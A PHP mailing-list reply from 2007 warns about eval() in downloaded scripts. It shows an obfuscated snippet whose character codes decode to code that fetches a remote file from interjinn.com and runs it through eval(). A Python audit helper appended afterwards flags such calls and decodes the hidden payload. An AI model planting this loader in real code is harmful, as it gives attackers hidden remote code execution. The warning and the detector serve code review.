RE: Re: Question on virus/worms

On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unnecessary fsockopen(), exec() etc. that isn't
> related to the script's original use).

And be very careful with eval(). It's a gold mine for hackers since then
they can just do things like:

<?php

    // The payload is hidden as a comma-separated list of character codes,
    // so a grep for eval(), file() or a URL finds nothing readable.
    $stuff =
        '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,'
       .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,'
       .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,'
       .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,'
       .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,'
       .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,'
       .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,'
       .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,'
       .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,'
       .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,'
       .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,'
       .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,'
       .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,'
       .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,'
       .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59';

    // Turn the code list into a chr(...).chr(...)... expression; even the
    // word "chr" is spelled out letter by letter to dodge simple searches.
    $stuff = explode( ',', $stuff );
    $stuff = 'c'.'h'.'r'.'('.implode( ').'
            .'c'.'h'.'r'.'(', $stuff ).');';

    // First eval() rebuilds the hidden PHP source as a string,
    // the second eval() runs it.
    $stuff = eval( 'return '.$stuff );
    $stuff = eval( $stuff );

?>

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'
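A small audit helper for the review Tim and Rob describe, added here as an example (not code from the thread or from InterJinn): it lists the dangerous calls in a PHP file and statically decodes comma-separated character-code strings, so the hidden source can be read without ever running it. The sample PHP is constructed and uses the same chr()/eval() trick as the posted snippet; the function and variable names are my own.

```python
import re

# Constructed sample: a chr()-chain assembled from character codes, split
# across two string fragments, then handed to eval() twice (as above).
SAMPLE_PHP = """<?php
$stuff = '101,99,104,111,32,'
       .'39,104,105,39,59';
$stuff = explode(',', $stuff);
$stuff = 'chr('.implode(').chr(', $stuff).');';
$stuff = eval('return '.$stuff);
eval($stuff);
?>"""

SUSPECT_CALLS = ("eval", "exec", "system", "passthru", "shell_exec",
                 "fsockopen", "base64_decode", "create_function")
CALL = re.compile(r"\b(" + "|".join(SUSPECT_CALLS) + r")\s*\(")
# a quoted run of 1-3 digit numbers separated by commas (trailing comma allowed)
CODE_RUN = re.compile(r"'(\d{1,3}(?:,\d{1,3})*),?'")

def find_suspect_calls(src):
    """Return (line_no, function_name) for every flagged call in the source."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        for m in CALL.finditer(line):
            hits.append((n, m.group(1)))
    return hits

def decode_char_code_strings(src):
    """Statically decode numeric char-code lists into the text they encode.
    Fragments glued with '.' across lines are joined first, nothing is executed."""
    joined = re.sub(r"'\s*\.\s*'", "", src)   # 'abc' . 'def'  ->  'abcdef'
    decoded = []
    for m in CODE_RUN.finditer(joined):
        codes = [int(c) for c in m.group(1).split(",")]
        # keep only runs long enough to matter that decode to printable text
        if len(codes) >= 4 and all(32 <= c < 127 or c in (9, 10, 13) for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded

def audit(src):
    """Combine both checks into one report for a reviewer."""
    return {"calls": find_suspect_calls(src),
            "decoded": decode_char_code_strings(src)}

if __name__ == "__main__":
    print(audit(SAMPLE_PHP))
```

Run it over each downloaded script before deployment; any decoded string that turns out to be PHP, or any flagged call that has nothing to do with the script's stated purpose, is what Tim's review is meant to catch.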

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

